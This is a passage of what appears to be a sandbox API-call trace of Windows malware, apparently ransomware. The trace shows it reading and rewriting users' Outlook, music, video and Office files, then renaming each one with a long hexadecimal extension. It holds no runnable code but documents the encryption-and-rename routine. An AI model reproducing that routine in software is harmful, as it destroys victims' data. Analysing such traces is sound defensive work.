0x0 [0167.204] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.205] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0167.206] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\norman@gdllo.de.pst", lpString2=".476794B1DDA4BC870F969892122B807AB7FCBA3B003AB225AE36A398EBB1E739" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\norman@gdllo.de.pst.476794B1DDA4BC870F969892122B807AB7FCBA3B003AB225AE36A398EBB1E739") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\Outlook Files\\norman@gdllo.de.pst.476794B1DDA4BC870F969892122B807AB7FCBA3B003AB225AE36A398EBB1E739" [0167.206] GetProcessHeap () returned 0x270000 [0167.206] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x42fb750 [0167.207] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x42fb750, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0167.211] CloseHandle (hObject=0x598) returned 1 [0167.214] GetProcessHeap () returned 0x270000 [0167.216] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.217] RtlInterlockedCompareExchange64 () returned 0x1 [0167.217] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.226] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.227] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.228] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.230] RtlInterlockedCompareExchange64 () returned 0x0 [0167.230] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.241] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.243] RtlInterlockedCompareExchange64 () returned 0x0 [0167.243] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.255] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.257] RtlInterlockedCompareExchange64 () returned 0x0 [0167.257] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.269] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.271] RtlInterlockedCompareExchange64 () returned 0x0 [0167.271] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.283] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.285] RtlInterlockedCompareExchange64 () returned 0x0 [0167.285] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.297] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.298] RtlInterlockedCompareExchange64 () returned 0x0 [0167.298] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.313] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.319] RtlInterlockedCompareExchange64 () returned 0x0 [0167.319] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.852] ReadFile (in: hFile=0x5b0, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0167.852] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.853] WriteFile (in: hFile=0x5b8, lpBuffer=0x7600180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75e0048) returned 1 [0167.855] RtlInterlockedCompareExchange64 () returned 0x0 [0167.855] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0168.411] ReadFile (in: hFile=0x5b8, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0168.424] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0168.426] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7422118, ReturnLength=0x723f8ec) returned 0x0 [0168.427] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\vENfC-vF_q47b2P1dmc.mp3", lpString2=".C90A574B0840F003F639FB206308614AFEBE81D8FC626DD214998D200E35A931" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\vENfC-vF_q47b2P1dmc.mp3.C90A574B0840F003F639FB206308614AFEBE81D8FC626DD214998D200E35A931") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\vENfC-vF_q47b2P1dmc.mp3.C90A574B0840F003F639FB206308614AFEBE81D8FC626DD214998D200E35A931" [0168.427] GetProcessHeap () returned 0x270000 [0168.427] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x4334088 [0168.427] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x723f8dc, FileInformation=0x4334088, Length=0x120, FileInformationClass=0xa) returned 0x0 [0168.429] CloseHandle (hObject=0x5b8) returned 1 [0168.430] GetProcessHeap () returned 0x270000 [0168.432] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0168.432] RtlInterlockedCompareExchange64 () returned 0x0 [0168.432] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0169.293] ReadFile (in: hFile=0x590, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0169.294] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0169.318] WriteFile (in: hFile=0x5b8, lpBuffer=0x7779140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7759008 | out: lpBuffer=0x7779140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7759008) returned 1 [0169.319] RtlInterlockedCompareExchange64 () returned 0x0 [0169.319] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0169.327] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x75aa0b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x75aa0b8, ReturnLength=0x723f8ec) returned 0x0 [0169.328] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\-2wj_ZU_TXUboswwa.flv", lpString2=".7BFD4C8DF7F4A4865A8E38D77DF20741F98319A9A6ED0412C2758858ADA77A36" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\-2wj_ZU_TXUboswwa.flv.7BFD4C8DF7F4A4865A8E38D77DF20741F98319A9A6ED0412C2758858ADA77A36") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\-2wj_ZU_TXUboswwa.flv.7BFD4C8DF7F4A4865A8E38D77DF20741F98319A9A6ED0412C2758858ADA77A36" [0169.328] GetProcessHeap () returned 0x270000 [0169.328] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x4334528 [0169.328] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x723f8dc, FileInformation=0x4334528, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0169.329] CloseHandle (hObject=0x5a4) returned 1 [0169.330] GetProcessHeap () returned 0x270000 [0169.332] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0169.333] RtlInterlockedCompareExchange64 () returned 0x1 [0169.333] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0169.334] WriteFile (in: hFile=0x5b0, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0169.336] RtlInterlockedCompareExchange64 () returned 0x0 [0169.336] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0170.913] ReadFile (in: hFile=0x5cc, lpBuffer=0x7909298, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x78e9160 | out: lpBuffer=0x7909298*, lpNumberOfBytesRead=0x0, lpOverlapped=0x78e9160) returned 1 [0170.924] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0170.925] WriteFile (in: hFile=0x590, lpBuffer=0x76d9030*, nNumberOfBytesToWrite=0x5c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8ef8 | out: lpBuffer=0x76d9030*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76b8ef8) returned 1 [0170.927] RtlInterlockedCompareExchange64 () returned 0x0 [0170.927] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0171.647] ReadFile (in: hFile=0x590, lpBuffer=0x78e1140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x78c1008 | out: lpBuffer=0x78e1140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x78c1008) returned 1 [0171.647] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0171.653] ReadFile (in: hFile=0x5cc, lpBuffer=0x7909298, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x78e9160 | out: lpBuffer=0x7909298*, lpNumberOfBytesRead=0x0, lpOverlapped=0x78e9160) returned 1 [0171.653] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0171.670] ReadFile (in: hFile=0x5b0, lpBuffer=0x76d9030, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8ef8 | out: lpBuffer=0x76d9030*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8ef8) returned 1 [0171.670] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0171.689] ReadFile (in: hFile=0x5d8, lpBuffer=0x752a588, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a450 | out: lpBuffer=0x752a588*, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a450) returned 1 [0171.690] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0171.692] WriteFile (in: hFile=0x590, lpBuffer=0x78e1140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78c1008 | out: lpBuffer=0x78e1140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78c1008) returned 1 [0171.838] RtlInterlockedCompareExchange64 () returned 0x9 [0171.838] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0172.020] NtQueryObject (in: Handle=0x600, ObjectInformationClass=0x1, ObjectInformation=0x77590b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x77590b8, ReturnLength=0x723f8ec) returned 0x0 [0172.021] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", lpString2=".D5EDDD417018855924ED1B33984356D93C8295F62596E64F8F56FFC353E99D52" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.D5EDDD417018855924ED1B33984356D93C8295F62596E64F8F56FFC353E99D52") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.D5EDDD417018855924ED1B33984356D93C8295F62596E64F8F56FFC353E99D52" [0172.021] GetProcessHeap () returned 0x270000 [0172.021] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x43348a0 [0172.021] NtSetInformationFile (FileHandle=0x600, IoStatusBlock=0x723f8dc, FileInformation=0x43348a0, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0172.146] CloseHandle (hObject=0x600) returned 1 [0172.147] GetProcessHeap () returned 0x270000 [0172.149] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0172.165] RtlInterlockedCompareExchange64 () returned 0x1 [0172.165] GetQueuedCompletionStatus (CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff) Thread: id = 110 os_tid = 0xad4 [0142.355] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.284] WriteFile (in: hFile=0x594, lpBuffer=0x74401a0*, nNumberOfBytesToWrite=0x5600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7420068 | out: lpBuffer=0x74401a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7420068) returned 1 [0155.290] RtlInterlockedCompareExchange64 () returned 0x0 [0155.290] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.290] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7420118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7420118, ReturnLength=0x72aff5c) returned 0x0 [0155.291] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml", lpString2=".7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml.7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml.7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D" [0155.291] GetProcessHeap () returned 0x270000 [0155.291] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x196) returned 0x432df60 [0155.292] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x72aff4c, FileInformation=0x432df60, Length=0x196, FileInformationClass=0xa) returned 0x0 [0155.294] CloseHandle (hObject=0x594) returned 1 [0155.298] GetProcessHeap () returned 0x270000 [0155.299] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7420068 | out: hHeap=0x270000) returned 1 [0155.299] RtlInterlockedCompareExchange64 () returned 0x1 [0155.299] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.302] ReadFile (in: hFile=0x594, lpBuffer=0x74401a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7420068 | out: lpBuffer=0x74401a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7420068) returned 1 [0155.302] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.341] WriteFile (in: hFile=0x590, lpBuffer=0x74401a0*, nNumberOfBytesToWrite=0x5200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7420068 | out: lpBuffer=0x74401a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7420068) returned 1 [0155.342] RtlInterlockedCompareExchange64 () returned 0x0 [0155.342] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.343] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7420118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7420118, ReturnLength=0x72aff5c) returned 0x0 [0155.344] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml", lpString2=".75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml.75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml.75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05" [0155.344] GetProcessHeap () returned 0x270000 [0155.344] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x19a) returned 0x2b9510 [0155.344] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x72aff4c, FileInformation=0x2b9510, Length=0x19a, FileInformationClass=0xa) returned 0x0 [0155.346] CloseHandle (hObject=0x590) returned 1 [0155.350] GetProcessHeap () returned 0x270000 [0155.351] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7420068 | out: hHeap=0x270000) returned 1 [0155.351] RtlInterlockedCompareExchange64 () returned 0x1 [0155.351] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.354] ReadFile (in: hFile=0x590, lpBuffer=0x74401a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7420068 | out: lpBuffer=0x74401a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7420068) returned 1 [0155.354] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.357] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7420118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7420118, ReturnLength=0x72aff5c) returned 0x0 [0155.358] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat", lpString2=".7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat.7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat.7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A" [0155.358] GetProcessHeap () returned 0x270000 [0155.358] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x196) returned 0x432e2b0 [0155.358] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x72aff4c, FileInformation=0x432e2b0, Length=0x196, FileInformationClass=0xa) returned 0x0 [0155.360] 